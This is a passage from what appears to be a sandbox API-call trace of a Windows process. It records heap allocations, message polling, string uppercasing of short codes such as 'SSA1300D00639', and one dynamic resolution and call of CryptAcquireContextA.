cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0206.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0206.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0206.978] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContext") returned 0x0 [0206.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0206.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0206.978] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0206.978] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2466db0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0206.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0206.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0206.979] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContextA") returned 0x74d491dd [0206.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0206.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0206.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3688 | out: hHeap=0x25c0000) returned 1 [0206.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0206.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0206.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0206.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0206.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0206.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0206.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0206.979] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xad2940) returned 1 [0206.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0206.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0206.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0206.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0206.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0206.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0206.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0206.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0206.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0206.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0206.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0206.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0206.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0206.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0206.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0206.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0206.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0206.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0206.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0206.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0206.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0206.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0206.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0206.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0206.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0206.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0206.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0206.982] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0206.982] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0206.982] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0206.982] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0206.982] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0206.982] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0206.982] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0206.982] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0206.982] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0206.982] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0206.982] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0206.982] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0206.982] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0206.982] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0206.982] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0206.982] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0206.982] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0206.982] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0206.983] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0206.983] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0206.983] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa188 [0206.983] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0206.983] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0206.983] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0206.983] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0206.983] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0206.983] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0206.983] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0206.983] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa188 [0206.983] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0206.983] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0206.983] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0206.983] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0206.983] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0206.983] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0206.983] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0206.983] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0206.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0206.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0206.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0206.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0206.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0206.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0206.984] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0206.984] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0206.984] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0206.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0206.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0206.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0206.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0206.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0206.984] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0206.984] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0206.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0206.984] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0206.984] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.985] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0206.985] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0206.985] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0206.985] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.985] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0206.985] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0206.985] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0206.985] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0206.985] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.985] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0206.985] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0206.985] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0206.985] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0206.985] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0206.985] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0206.985] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0206.985] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.985] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.985] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0206.985] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0206.986] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0206.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0206.986] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0206.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0206.986] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0206.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0206.986] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0206.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0206.986] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0206.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0206.986] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0206.986] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0206.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0206.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0206.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ff0 [0206.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0206.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0206.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0206.987] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0206.987] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0206.987] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0206.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0206.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0206.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0206.987] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0206.987] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0206.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0206.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0206.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0206.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0206.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0206.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0206.987] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0206.987] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0206.987] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0206.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0206.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0206.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0206.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0206.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0206.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0206.988] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0206.988] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0206.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0206.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0206.988] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0206.988] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0206.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0206.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0206.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0206.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0206.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0206.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0206.988] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0206.988] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0206.988] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0206.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0206.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0206.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0206.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0206.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0206.989] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0206.989] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0206.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0206.989] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0206.989] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0206.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0206.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ff0 [0206.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0206.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0206.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0206.989] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0206.989] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0206.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0206.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0206.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0206.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0206.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0206.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0206.990] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0206.990] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0206.990] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0206.990] RtlAllocateHeap (HeapHandle=0x25c0000, 